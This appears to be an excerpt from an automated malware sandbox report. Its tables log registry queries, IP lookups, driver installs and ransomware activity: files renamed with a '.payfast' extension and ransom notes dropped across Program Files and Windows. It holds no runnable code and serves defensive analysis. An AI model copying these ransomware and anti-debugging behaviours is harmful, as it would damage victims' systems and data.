| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\DA0SNTjID05uVTiLF3fjEqmT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\lgJGQ8WVm0TB30ZFEEjC5Nff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\PpQsW20a0P92HEBP_c6swrBX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\UkdBd92nKdEVxt7NH_xJ86WB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\J6vAkH5kawOVLHYY8QC6PvMX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tdQsgapgd7CCgb2Nac7hGQFU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\I7r1FrUEwNmYSO5O6BudkuEm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\NUc1s3wqp1OTSn6gv7mG4x9h.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\5AA1.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963C.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e} | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963C.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963D.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963E.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{64f23e3a-d748-0d46-a3b6-1b57e42d340e}\SET963E.tmp | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\osfFPA\addins.xml.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.6.0_x64__8wekyb3d8bbwe\Assets\NotepadAppList.targetsize-20.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreLogo.scale-400_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pubs.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\PreviewMailList.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.scale-200_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-commonjs\createTheme.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_KMS_Client_AE-ul-oob.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_2021.427.1821.0_neutral_~_8wekyb3d8bbwe\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\FeedbackHubSplashScreen.scale-100_altform-colorful.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office 15\ClientX64\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_1.0.6.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WeatherSmallTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutImage.layoutdir-RTL.gif | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_MAK-ul-oob.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarMediumTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\Devices\Frames\FoldFrameDouble.svg | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-amd\CommandBar.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\PhoneNotifications\theme-dark\DevicePermission.svg | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-ul-oob.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntimeR_PrepidBypass-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\mecontrol.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\contrast-black\PowerAutomateAppIcon.altform-lightunplated_targetsize-256.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Data\StreamingAssets\10175_upward_dust_explosion.json | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Office 2007 - 2010.xml.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_x64__8wekyb3d8bbwe\Assets\Xbox_LargeTile.scale-200.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21061.10121.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-256_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3B18I.tmp | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\msotd.exe.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.6.0_x64__8wekyb3d8bbwe\Assets\contrast-black\NotepadAppList.targetsize-80.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\Calling\CallingPCConsent.svg | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\YourPhoneAppProxy\zh-TW\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_neutral_~_cw5n1h2txyewy\AppxSignature.p7x | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-pl.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Xbox_MedTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Xbox_SmallTile.scale-100_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-200_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2106.12410.0_neutral_split.scale-100_8wekyb3d8bbwe\Images\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Grace-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\officemuiset.msi.16.en-us.boot.tree.dat | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SONORA\PREVIEW.GIF | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.payfast.146-F3E-F86 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe\KnownGameList.bin | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\NewsAppList.targetsize-16_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\FPA_f7\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2106.14307.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-256_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.4.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesSplashScreen.scale-200_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Todos_0.48.41901.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StoreLogo.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\GenericMailBadge.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1589.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID346.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8C00.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI19C0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDBD6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF3C6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1FCC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI22AB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFAC17E9B6DBFF2C1E.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEAEC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f767b66.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFF002223B35C293EE.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f767b66.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE107.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFE27.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFF3B9684D5E4B6CCF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8CFF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF841A1ADDDB05F725.TMP | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
